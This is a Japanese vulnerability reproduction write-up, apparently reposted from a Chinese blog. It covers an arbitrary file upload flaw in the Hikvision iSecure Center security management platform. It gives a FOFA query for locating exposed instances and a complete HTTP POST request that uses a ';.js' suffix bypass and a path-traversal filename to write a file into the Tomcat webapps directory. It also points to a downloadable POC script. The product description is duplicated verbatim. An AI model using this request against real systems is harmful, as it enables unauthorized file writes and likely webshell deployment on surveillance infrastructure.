Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性がある

Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性がある

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. Hikvision isecure center 統合セキュリティ管理プラットフォームの概要

WeChat 公式アカウント検索: 南峰脆弱性再出現ライブラリ この記事は、南峰脆弱性再出現ライブラリ公式アカウントで最初に公開されました。

HIKVISION iSecure Center 総合セキュリティ管理プラットフォームは、ビデオ監視、オールインワン カード、駐車場、警報検出、その他のシステム機器にアクセスしてエッジ ノード データを取得し、セキュリティを実現する「統合」および「インテリジェント」プラットフォームのセットです。情報統合 電子地図との連携により、各システムの機能を統合し、リッチなインテリジェントアプリケーションを実現します。HIKVISION iSecure Center プラットフォームは、「統合ソフトウェア技術アーキテクチャ」という先進的なコンセプトに基づいて設計されており、ビジネス面でのプラットフォームの弾力的な拡張に対応するためのビジネスコンポーネント技術を採用しています。同プラットフォームは、業界全体の総合セキュリティビジネス全般に適用可能で、各システムのリソースを統合・一元管理し、統一導入、統一構成、統一管理、統一スケジューリングを実現する。

2. 脆弱性の説明

HIKVISION iSecure Center 総合セキュリティ管理プラットフォームは、ビデオ監視、オールインワン カード、駐車場、警報検出、その他のシステム機器にアクセスしてエッジ ノード データを取得し、セキュリティを実現する「統合」および「インテリジェント」プラットフォームのセットです。情報統合 電子地図との連携により、各システムの機能を統合し、リッチなインテリジェントアプリケーションを実現します。HIKVISION iSecure Center プラットフォームは、「統合ソフトウェア技術アーキテクチャ」という先進的なコンセプトに基づいて設計されており、ビジネス面でのプラットフォームの弾力的な拡張に対応するためのビジネスコンポーネント技術を採用しています。同プラットフォームは、業界全体の総合セキュリティビジネス全般に適用可能で、各システムのリソースを統合・一元管理し、統一導入、統一構成、統一管理、統一スケジューリングを実現する。Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性がある

CVE番号:

CNNVD番号:

CNVD番号:

3. バージョンに影響を与える

HIKVISION iSecure Center 統合セキュリティ管理プラットフォーム 

4. fofaクエリステートメント

app="HIKVISION-iSecure-Center"

5. 脆弱性の再発

脆弱性リンク: https://127.0.0.1/clusterMgr/836424300.txt;.js 脆弱性データ パッケージ:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c

--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream

332299402
--ea26cdac4990498b32d7a95ce5a5135c--

アップロードされたファイルは /clusterMgr/153107606.txt;.js にあります。 153107606 を、上記のデータ パッケージでアップロードしたファイル名に変更します。正常にアップロードされました

6.POC&EXP

パブリック アカウント Nanfeng Vulnerability Reproduction Library をフォローし、Vulnerability Reproduction 38 と返信して POC ツールのダウンロード アドレスを取得します。 使用法: python3 .\vuln31.py https://127.0.0.1/ / で終わることを忘れないでください。 

7. 是正意見

解決策を見つけるには、製造元に問い合わせてください: https://www.hikvision.com/cn/

8. 過去のレビュー

Chamilo 学習管理ソフトウェアのコマンド実行の脆弱性 (CVE-2023-34960)

Hikvision iVMS 統合セキュリティ システムに任意のファイルがアップロードされる脆弱性が再発

おすすめ

転載: blog.csdn.net/nnn2188185/article/details/131460363